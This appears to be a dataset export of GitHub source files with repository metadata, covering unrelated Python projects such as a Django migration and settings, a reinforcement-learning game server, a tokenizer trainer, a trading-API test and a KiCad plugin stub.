blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 213
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 246
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ca533f2d101a318a97772ebfb27bef0b60460aa2 | a82961498421f8dbc6ed15ba7c22d82763b85e95 | /rides_handling/migrations/0019_auto_20180514_1703.py | 0ec616da15661531563117745b8860da2fc9c0a5 | [
"MIT"
] | permissive | EverythingWorks/Unter | f7ae61c33f66ec37b48a3e2f86dfa6f5d9edd9f2 | a03b4c8fc5cc77095021b9b504ea6c00de8a5a18 | refs/heads/master | 2020-03-10T07:25:56.055846 | 2018-06-04T04:22:21 | 2018-06-04T04:22:21 | 129,262,544 | 4 | 1 | MIT | 2018-05-29T14:03:35 | 2018-04-12T14:17:22 | Jupyter Notebook | UTF-8 | Python | false | false | 747 | py | # Generated by Django 2.0.4 on 2018-05-14 17:03
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('rides_handling', '0018_auto_20180512_0937'),
]
operations = [
migrations.AddField(
model_name='ride',
name='estimated_trip_time',
field=models.DecimalField(decimal_places=6, default=0, max_digits=9),
preserve_default=False,
),
migrations.AlterField(
model_name='ride',
name='driver',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='driver', to='rides_handling.Profile'),
),
]
| [
"danpisq@gmail.com"
] | danpisq@gmail.com |
f6d5899459cd4b1b222d2d880badb5acd97d8ffb | ee82b3b34449187dc34ac22afa49d490b8f94831 | /design/optblock.py | 1622f3770f44d819e43c3a4b4b6a06f08c4e6328 | [
"MIT"
] | permissive | raddanki/softblock | 2d16c0acbcdfbf969f489ab5a832e55c15ec4cc7 | 25f1ed61a0ab4c377e0b57546b57287bb90667bf | refs/heads/master | 2023-04-05T03:08:00.549190 | 2021-04-26T13:27:45 | 2021-04-26T13:27:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,015 | py | #! /usr/bin/python3
from sklearn.neighbors import DistanceMetric
import numpy as np
from .nbpMatch import nbpwrap
from .design import Design
class OptBlock(Design):
def __init__(self, treatment_prob: float = 0.5):
self.treatment_prob = treatment_prob
super(OptBlock, self).__init__()
def fit(self, X: np.ndarray, distance="mahalanobis") -> None:
N = X.shape[0]
if N % 2 == 1:
idx_ignore = np.random.choice(N, 1).item()
else:
idx_ignore = None
self.X = X
if distance == "mahalanobis":
inv_cov = np.linalg.pinv(np.cov(X, rowvar=False))
dist_maker = DistanceMetric.get_metric("mahalanobis", VI=inv_cov)
elif distance == "euclidean":
dist_maker = DistanceMetric.get_metric("euclidean")
else:
raise NotImplementedError(
"Only Mahalanobis and Euclidean distance are implemented."
)
distances = dist_maker.pairwise(X)
if idx_ignore is not None:
dist_ignore = distances[idx_ignore, :]
dist_ignore[idx_ignore] = np.inf
idx_nn = np.argmin(dist_ignore)
distances = np.delete(np.delete(distances, idx_ignore, 0), idx_ignore, 1)
n_to_pass = N if idx_ignore is None else N - 1
self.matches = nbpwrap(wt=distances.T.reshape(-1), n=n_to_pass)
# nbpwrap indexes from 1.
self.matches = self.matches - 1
blocks = {tuple(sorted(x)) for x in enumerate(self.matches)}
self.blocks = [list(block) for block in blocks]
self.block_membership = np.array([-1] * N)
for block_id, block in enumerate(blocks):
for member_idx, member in enumerate(block):
if idx_ignore is not None:
if member == idx_nn:
self.blocks[block_id].append(idx_ignore)
self.block_membership[idx_ignore] = block_id
if member >= idx_ignore:
self.block_membership[member+1] = block_id
self.blocks[block_id][member_idx] = member + 1
else:
self.block_membership[member] = block_id
def assign(self, X: np.ndarray) -> np.ndarray:
if X is None:
X = self.X
elif X is self.X:
pass
else:
raise ValueError("Can't go out of sample here.")
N = X.shape[0]
A = np.array([0] * N)
for block in self.blocks:
M = len(block)
En_trt = M * self.treatment_prob
n_trt = int(max(1, np.floor(En_trt)))
n_ctl = int(max(1, np.floor(M - En_trt)))
n_extra = int(np.floor(M - n_trt - n_ctl))
a_extra = int(np.random.choice([0, 1], 1).item())
n_trt += a_extra * n_extra
trted = np.random.choice(M, n_trt, replace=False)
for unit in trted:
A[block[unit]] = 1
return A
| [
"arbour@Davids-MacBook-Pro.local"
] | arbour@Davids-MacBook-Pro.local |
e048ecf2bf1cfedf302f50a696e79ffb86f316b1 | db5f9683e06afffb1657b3919d302af4eb1c0b2a | /miscellaneous/infomaterial/create_state/main.py | aa8c08dce913169c02dad351c576de4fccd2ffc4 | [
"MIT"
] | permissive | Birkenpapier/informaticup21 | a071e515acac8a60d5cd0fe3d4918fcbf21e3f04 | 193ff04be765dc5f11206f75eb3225cfeb94eb87 | refs/heads/master | 2023-03-25T17:51:36.380575 | 2021-01-17T19:24:14 | 2021-01-17T19:24:14 | 352,364,199 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,280 | py | import make_decision as make_d
import pylogging as IC20log
import tensorflow as tf
import numpy as np
import time
import os
from bottle import post, request, run, BaseRequest
from keras.utils import to_categorical
from drl_agent.DQN import DQNAgent
from create_training_data import *
from random import randint
from game_state import *
from PIL import Image
init_action = None
state_init1 = None
state_init2 = None
state_old = None
counter_games = 0
game_state = game_state()
agent = DQNAgent()
def reward_function(game):
if game["round"] == 1:
return 0
if game["outcome"] == 'pending':
return 1 # + game["population_reduction"] * 3
elif game["outcome"] == 'win':
return 20
elif game["outcome"] == 'loss':
return -20
def init_game(game):
global state_init1
state_init1 = game
action = [0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0] # init action without changes or moves
return action
def init_game_next(game_json, game, action):
global state_init1
global state_init2
state_init2 = game
reward1 = reward_function(game_json)
done = None
if reward1 == 20 or reward1 == -20:
done = True
else:
done = False
agent.remember(state_init1, action, reward1, done)
@post("/")
def index():
global init_action
global counter_games
global state_old
game = request.json
print(f'-----------------------> round: {game["round"]}, outcome: {game["outcome"]}')
game_state.update_state(game)
if game is not None:
state = create_save_TD(game_state)
try:
if game["round"] == 1:
init_action = init_game(state)
init_action = {"type": "endRound"}
return init_action
if game["round"] == 2:
init_action_next = init_game_next(game, state, init_action)
# TODO here comes the answer from the agent
except Exception as e:
IC20log.getLogger("Index").error(str(e))
# print(f"this is the action: {action}")
agent.epsilon = 80 - counter_games
try:
state_old = np.hstack(state) # how to safe the old state after the call of the method?
# perform random actions based on agent.epsilon, or choose the action
if randint(0, 200) < agent.epsilon:
final_move = to_categorical(randint(0, 11), num_classes=12)
print(f"final_move based random: {final_move}")
else:
# predict action based on the old state
state_old = np.hstack(state)
prediction = agent.model.predict(state_old.reshape((1, 4450)))
final_move = to_categorical(np.argmax(prediction[0]), num_classes=12)
print(f"final_move based prediction: {final_move}")
# perform new move and get new state
state_new = np.hstack(state)
# set reward for the new state
reward = reward_function(game)
except Exception as e:
IC20log.getLogger("Index").error(str(e))
done = None
if reward == 20 or reward == -20:
done = True
else:
done = False
# store the new data into a long term memory
agent.remember(state_old, final_move, reward, done)
if game["outcome"] == 'loss' or game["outcome"] == 'win':
counter_games += 1
elif game["outcome"] == 'win':
img = Image.open('./data/hiclipart.png')
img.show()
# saving the trained model
if counter_games == 20:
agent.model.save_weights('weights.hdf5')
counter_games += 1
print(f"counter_games: {counter_games}")
action = make_d.Action.create_Action(game_state, final_move)
return action
if __name__ == '__main__':
port = 50123
# Workaround for the current problem of incopability to work with CUDA and TF -> using CPU this way in code
# os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
os.environ['CUDA_VISIBLE_DEVICES'] = ''
if tf.test.gpu_device_name():
print('[DEBUG] GPU found')
else:
print("[DEBUG] No GPU found")
# till here Workaround
IC20log.getLogger("Server Main").info("starting server at Port %s" % port )
BaseRequest.MEMFILE_MAX = 10 * 1024 * 1024
run(host="0.0.0.0", port=port, quiet=True) | [
"kevin@peivareh.com"
] | kevin@peivareh.com |
76063ba8a654410eb9a78179fbe0b90a12bb85ad | 32a0cb40ad22c725f41984d8d234589bdd4cb58f | /module_3/tasks/re_1.py | a79e75aed30ef0f4cf1be51358aa3f18fa714ae8 | [] | no_license | egolov/stepic-python | 2ef7b201d47dc73388b61a01fb864ec978b8d1d2 | c160c9ef752c0a4dd82217917909ee5547a1e583 | refs/heads/master | 2020-03-20T02:15:07.400710 | 2018-06-12T17:20:49 | 2018-06-12T17:20:49 | 137,105,217 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 240 | py | import re
# вхождение 'cat' более двух раз
pattern_1 = r".*cat.*cat"
pattern_2 = r"cat"
print(re.match(pattern_1, "abc cat and cat abc")) # is not None
print(re.findall(pattern_2, "abc cat and cat abc")) # len() > 1
| [
"e-golov@yandex-team.ru"
] | e-golov@yandex-team.ru |
bf81381a68065e4e52ed4a7600692ef8632e9a7c | d076d75093b374418b5704703f841623344c0a82 | /Tokenizer/make_tokenizer.py | c02073ccd07173d25698296a1b1dcac4630d2499 | [] | no_license | sangHa0411/BERT | db1e3284ed22927fc2f19e819a5946b634c9bacf | cb272f94d77770b9b29d7493238e5ea1c5554420 | refs/heads/main | 2023-08-28T14:20:31.398036 | 2021-10-19T01:25:06 | 2021-10-19T01:25:06 | 417,094,479 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,996 | py | import os
import re
import sys
import argparse
from tqdm import tqdm
from nltk.tokenize import sent_tokenize
from konlpy.tag import Mecab
def train(args) :
sys.path.append('../')
from tokenizer import write_data, train_spm
from loader import get_data, preprocess_data
from preprocessor import SenPreprocessor
print('Get Newspaper Data')
data = get_data(args.data_dir, args.file_size)
print('Extract Text Data')
text_data = []
for json_data in tqdm(data) :
text_list = preprocess_data(json_data)
text_data.extend(text_list)
print('Tokenizing Data')
sen_data = []
for text in tqdm(text_data) :
sen_list = sent_tokenize(text)
sen_data.extend(sen_list)
print('Size of Sentence Data : %d \n' %len(sen_data))
print('Preprocessing Data')
mecab = Mecab()
sen_preprocessor = SenPreprocessor(mecab)
sen_preprocessed = []
for sen in tqdm(sen_data) :
if len(sen) > args.max_size :
continue
sen = sen_preprocessor(sen)
if sen != None :
sen_preprocessed.append(sen)
print('Write Text Data')
text_path = os.path.join(args.tokenizer_dir, 'kor_newspaper.txt')
write_data(sen_preprocessed, text_path)
print('Train Tokenizer')
train_spm(text_path, os.path.join(args.tokenizer_dir, 'tokenizer'), args.token_size)
if __name__ == '__main__' :
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', type=str, default='../../Data', help='Korean Newspaper Data directory')
parser.add_argument('--max_size', type=int, default=256, help='max length of sentence')
parser.add_argument('--file_size', type=int, default=30, help='size of newspaper file')
parser.add_argument('--tokenizer_dir', type=str, default='./', help='File Writing Directory')
parser.add_argument('--token_size', type=int, default=35000, help='Token Size (default: 35000)')
args = parser.parse_args()
train(args)
| [
"noreply@github.com"
] | sangHa0411.noreply@github.com |
053950d8dee6b200c63e069154c6d9c6ba7b21af | 02442f7d3bd75da1b5b1bf6b981cc227906a058c | /rocon/build/rocon_app_platform/rocon_app_manager/catkin_generated/pkg.develspace.context.pc.py | 3de9876b63c7300094cd88e5c7d2b10e59c73d88 | [] | no_license | facaisdu/RaspRobot | b4ff7cee05c70ef849ea4ee946b1995432a376b7 | e7dd2393cdabe60d08a202aa103f796ec5cd2158 | refs/heads/master | 2020-03-20T09:09:28.274814 | 2018-06-14T08:51:46 | 2018-06-14T08:51:46 | 137,329,761 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "rocon_app_manager"
PROJECT_SPACE_DIR = "/home/sclab_robot/turtlebot_ws/rocon/devel"
PROJECT_VERSION = "0.8.0"
| [
"facai_sdu@126.com"
] | facai_sdu@126.com |
02d4497caa6522455555c81d2715262be07fb67f | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_24610.py | ed0905d8047a088ab943cc1e32bc4dbc7d30b821 | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 69 | py | # Why int() argument must be a string or a number, not 'list'?
PForm
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
69991130e0c5ea9538a163c831d2b0caa0fd1571 | 8c5f5cf4ef550062d5511dd848d250b4f54918dd | /krishna/settings.py | 7956897358d0b28eb652179b32ba4c6438fb3f22 | [] | no_license | krishnagopaldubey/fuzzysearchwithgetmethod | af18c9c1834e0a367e1eb3ff5454ea946fb01376 | 116589b684e78e5d0c4f8f05fcd0d83a2ba3e9c6 | refs/heads/master | 2020-08-12T06:56:51.493043 | 2019-10-12T20:34:27 | 2019-10-12T20:34:27 | 214,711,316 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,125 | py | """
Django settings for krishna project.
Generated by 'django-admin startproject' using Django 2.1.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '&cv==od%vopf$i^i!lces9u1^(303y)0jezopp!3p!6qqsg&*s'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'polls',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'krishna.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'krishna.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
| [
"krishna@dolphinfoundry.com"
] | krishna@dolphinfoundry.com |
5c9f9ce0e28a0947dd8edbcea57820ca55c76184 | d3efc82dfa61fb82e47c82d52c838b38b076084c | /Autocase_Result/KCB_YCHF/KCB_YCHF_MM/SHOffer/YCHF_KCBYCHF_SHBP_153.py | 57c5b458804546c0a77bf642879eaa200c682c30 | [] | no_license | nantongzyg/xtp_test | 58ce9f328f62a3ea5904e6ed907a169ef2df9258 | ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f | refs/heads/master | 2022-11-30T08:57:45.345460 | 2020-07-30T01:43:30 | 2020-07-30T01:43:30 | 280,388,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,568 | py | #!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test//xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test//service")
from ServiceConfig import *
from ARmainservice import *
from QueryStkPriceQty import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test//mysql")
from CaseParmInsertMysql import *
from SqlData_Transfer import *
sys.path.append("/home/yhl2/workspace/xtp_test//utils")
from QueryOrderErrorMsg import queryOrderErrorMsg
from env_restart import *
class YCHF_KCBYCHF_SHBP_153(xtp_test_case):
def setUp(self):
#sql_transfer = SqlData_Transfer()
#sql_transfer.transfer_fund_asset('YCHF_KCBYCHF_SHBP_153')
#clear_data_and_restart_all()
#Api.trade.Logout()
#Api.trade.Login()
pass
#
def test_YCHF_KCBYCHF_SHBP_153(self):
title = '重启上海报盘(沪A最优五档即成转限价:分笔成交_累积成交金额 >= 手续费 且手续费小于最小值)'
# 定义当前测试用例的期待值
# 期望状态:初始、未成交、部成、全成、部撤已报、部撤、已报待撤、已撤、废单、撤废、内部撤单
# xtp_ID和cancel_xtpID默认为0,不需要变动
case_goal = {
'期望状态': '全成',
'errorID': 0,
'errorMSG': queryOrderErrorMsg(0),
'是否生成报单': '是',
'是否是撤废': '否',
# '是否是新股申购': '',
'xtp_ID': 0,
'cancel_xtpID': 0,
}
logger.warning(title)
# 定义委托参数信息------------------------------------------
# 参数:证券代码、市场、证券类型、证券状态、交易状态、买卖方向(B买S卖)、期望状态、Api
stkparm = QueryStkPriceQty('688011', '1', '4', '2', '0', 'S', case_goal['期望状态'], Api)
# 如果下单参数获取失败,则用例失败
if stkparm['返回结果'] is False:
rs = {
'报单测试结果': stkparm['返回结果'],
'测试错误原因': '获取下单参数失败,' + stkparm['错误原因'],
}
print(stkparm['错误原因'])
self.assertEqual(rs['报单测试结果'], True)
else:
wt_reqs = {
'business_type': Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_CASH'],
'order_client_id':5,
'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SH_A'],
'ticker': stkparm['证券代码'],
'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_SELL'],
'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_BEST5_OR_LIMIT'],
'price': stkparm['涨停价'],
'quantity': 300,
'position_effect':Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
}
rs = serviceTest(Api, case_goal, wt_reqs)
logger.warning('执行结果为' + str(rs['报单测试结果']) + ','
+ str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
## 还原可用资金
#sql_transfer = SqlData_Transfer()
#sql_transfer.transfer_fund_asset('YW_KCB_BAK_000')
#oms_restart()
self.assertEqual(rs['报单测试结果'], True) # 211
if __name__ == '__main__':
unittest.main()
| [
"418033945@qq.com"
] | 418033945@qq.com |
4c1da163636e9dd3c700a82633474e2178f8f902 | 16234b1ac9e2e2cb64c2e44dfb938525046a0d33 | /tests/test_vispy_plot.py | add3abf99799d98b6e7d8345985a7738a940b24c | [
"MIT"
] | permissive | cmsteinBR/FlatCAM | 8c0b41e2ea63a7c942c77cd1e4fc286b7b99da93 | f6e492916776384bdf3af28367679c2ae02c926a | refs/heads/master | 2021-01-18T00:22:07.056830 | 2016-08-04T16:08:55 | 2016-08-04T16:08:55 | 66,869,807 | 1 | 0 | null | 2016-08-29T18:32:44 | 2016-08-29T18:32:42 | Python | UTF-8 | Python | false | false | 1,660 | py | import sys
import unittest
from PyQt4 import QtGui, QtCore
from FlatCAMApp import App
from VisPyPatches import apply_patches
import random
import logging
class VisPyPlotCase(unittest.TestCase):
"""
This is a top-level test covering the Gerber-to-GCode
generation workflow.
THIS IS A REQUIRED TEST FOR ANY UPDATES.
"""
filenames = ['test', 'test1', 'test2', 'test3', 'test4']
def setUp(self):
self.app = QtGui.QApplication(sys.argv)
apply_patches()
# Create App, keep app defaults (do not load
# user-defined defaults).
self.fc = App()
self.fc.log.setLevel(logging.ERROR)
def tearDown(self):
del self.fc
del self.app
def test_flow(self):
for i in range(100):
print "Test #", i + 1
# Open test project
self.fc.open_project('tests/project_files/' + self.filenames[random.randint(0, len(self.filenames) - 1)])
print "Project", self.fc.project_filename
# Wait for project loaded and plotted
while True:
self.sleep(500)
if self.fc.proc_container.view.text.text() == 'Idle.' or self.fc.ui.isHidden():
break
# Interrupt on window close
if self.fc.ui.isHidden():
break
# Create new project and wait for a random time
self.fc.on_file_new()
self.sleep(random.randint(100, 1000))
def sleep(self, time):
timer = QtCore.QTimer()
el = QtCore.QEventLoop()
timer.singleShot(time, el, QtCore.SLOT("quit()"))
el.exec_()
| [
"denis_vic@mail.ru"
] | denis_vic@mail.ru |
05c42897a43ef1cd339385cd1d08994c838bd27a | 454de23b97631718c7c7795fdef14881e5758d22 | /Unit 3/fileIO.py | f523092c0042ed435999e78fc9b1e02607f2f1cd | [] | no_license | dhruv3/IntroToPython | 0ac7ab132abd89eb99e86dd62ccc884f454d2701 | 620d05269f33a1f8003986af87cb956b217359ec | refs/heads/master | 2021-01-22T05:43:18.095945 | 2017-05-18T13:30:35 | 2017-05-18T13:30:35 | 81,695,504 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 706 | py | #
#File I/O stuff
#
#Method 1
infile = 'testTextFile.txt'
f = open(infile, 'r')
data = f.read()
f.close()
print(data)
#len gives total char in the string data
print(len(data))
#clean the data
data = data.replace('"', '')
dataList = data.split(', ')
print(dataList)
print(len(dataList))
#Method 2
with open("testNum.txt", "r") as f:
for line in f:
print(line)
#write to a file
of = open("newOPFile.txt", "w")
with open("testNum.txt", "r") as f:
for line in f:
tempStr = line;
of.write(tempStr)
of.close()
#of we dont close we wont be able to write into our file
#this is because data we "wrote" stays in RAM and is only written to harddrive after file is closed
| [
"dhruv.mnit@gmail.com"
] | dhruv.mnit@gmail.com |
6eda11f72415c2c9a36b7f5635e2560ef63bf01a | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/pg_1318+062/sdB_pg_1318+062_lc.py | ff49a4e872dad3cb97afe62d31f086a25e90d3e8 | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 344 | py | from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[200.185083,5.983667], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_pg_1318+062/sdB_pg_1318+062_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
| [
"thomas@boudreauxmail.com"
] | thomas@boudreauxmail.com |
6e366b23ce962f4acf818615c993eb9f30b28562 | d8f44692c9f9f0a9a391a49db0f4f659a2ef6fe8 | /jsBuilds/jsSupport.py | 4817320de831b302adb53f3eddacb01f0fbe8e4b | [
"MIT"
] | permissive | skylarkgit/sql2phpclass | 045e71963574b719313fc98882f5c710435f101f | a79e7f3cfda8cb41ba00e8cbba0de33e9be759d6 | refs/heads/master | 2020-03-19T02:34:34.229287 | 2018-07-04T18:58:28 | 2018-07-04T18:58:28 | 135,640,687 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 759 | py | import sys
sys.path.append('..')
from jsBuilds.jsTemplates import *
def args(varList):
return ','.join(varList)
def reqData(varList):
return '+"&"+'.join('"'+x+'="obj.'+x for x in varList)
def objFormation(varlist):
return ','.join(x+':'+SCOPE(x) for x in varList)
def varsToAliasArr(varList):
arr={}
for v in varList.values():
arr[v.alias]=v
return arr
def createObjFromScope(varList):
return '{'+(','.join(v.alias+":"+PARSER(v.validType,SCOPE(v.alias)) for v in varList.values()))+'}'
def responseToScope(varList):
return ''.join(SCOPE(v.alias)+"=response.data.data."+v.alias+";" for v in varList.values())
def argsToScope(varList):
return ''.join(SCOPE(v.alias)+"="+v.alias+";" for v in varList.values())
| [
"abhay199658@gmail.com"
] | abhay199658@gmail.com |
60c083d45755c5c8515e991f42f96dd819d6e4d5 | fbbbcfa050612a6242c095060bad774b60fc914d | /archive_project/old_version.py | 184a635253393fb5e1f993b883ce043eb4385aee | [] | no_license | MitjaNemec/Kicad_action_plugins | 79b4fa0fb8fdcb0aba3770f871f0c25bd982bea6 | f7f2eaa567a7354459e17f108427584fa6a6a8a4 | refs/heads/master | 2023-08-29T12:09:48.978854 | 2023-06-15T18:41:08 | 2023-06-15T18:41:08 | 110,839,994 | 406 | 79 | null | 2022-03-31T06:31:07 | 2017-11-15T13:55:47 | Python | UTF-8 | Python | false | false | 1,473 | py | # -*- coding: utf-8 -*-
# action_replicate_layout.py
#
# Copyright (C) 2018 Mitja Nemec
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
import pcbnew
import wx
class OldVersion(pcbnew.ActionPlugin):
"""
Notify user of missing wxpython
"""
def defaults(self):
self.name = "Archive project"
self.category = "Archive project"
self.description = "Archive schematics symbols and 3D models"
def Run(self):
_pcbnew_frame = [x for x in wx.GetTopLevelWindows() if x.GetTitle().lower().startswith('pcbnew')][0]
caption = 'Archive project'
message = "This plugin works with KiCad 5.1 and higher"
dlg = wx.MessageDialog(_pcbnew_frame, message, caption, wx.OK | wx.ICON_INFORMATION)
dlg.ShowModal()
dlg.Destroy()
| [
"mitja.nemec@fe.uni-lj.si"
] | mitja.nemec@fe.uni-lj.si |
7ca71e74e605112ef507f107584f872545a68564 | 499efac953f9f0ed3ef1876b3a470250c75f7ac1 | /mnist_sklearn.py | 7f778519c5dc8279f17a25ce634530272f3881e0 | [] | no_license | ravi911sharma44/MNIST- | b7ffe5c2b9492e7997590a618c8a483f72709e95 | 15fb747ce7e928f963d4bd61d28a5411e98878c8 | refs/heads/main | 2023-07-17T03:04:02.138426 | 2021-08-14T15:31:24 | 2021-08-14T15:31:24 | 396,047,993 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 538 | py | import pandas as pd
df = pd.read_csv (r'E:\chat bot intern\week 3\mnist_train.csv\mnist_train.csv')
df = pd.DataFrame(df)
from sklearn.model_selection import train_test_split
X = df.drop('label', axis = 1)
Y = df.label
x_train, x_test, y_train, y_test = train_test_split(X, Y, test_size = 0.2)
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error
model = LinearRegression()
model.fit(x_train, y_train)
pred = model.predict(x_test)
print(mean_squared_error(y_test, pred)) | [
"noreply@github.com"
] | ravi911sharma44.noreply@github.com |
bb53fe452117f99a8d8f7b1e33f47e1ab79db0c2 | 77b16dcd465b497c22cf3c096fa5c7d887d9b0c2 | /Cron_Philip/Assignments/flaskolympics/olympics3/server.py | 3c8cc483f0488a3e80700542e08036210ca2f614 | [
"MIT"
] | permissive | curest0x1021/Python-Django-Web | a7cf8a45e0b924ce23791c18f6a6fb3732c36322 | 6264bc4c90ef1432ba0902c76b567cf3caaae221 | refs/heads/master | 2020-04-26T17:14:20.277967 | 2016-10-18T21:54:39 | 2016-10-18T21:54:39 | 173,706,702 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 322 | py | from flask import Flask, render_template, session
app = Flask(__name__)
app.secret_key = 'ThisIsSecret'
@app.route('/')
def myfirstfunction():
if not 'title' in session:
session['title'] = 'hello world'
return render_template('index.html', name="Mike")
if __name__ == '__main__':
app.run(debug = True)
| [
"43941751+curest0x1021@users.noreply.github.com"
] | 43941751+curest0x1021@users.noreply.github.com |
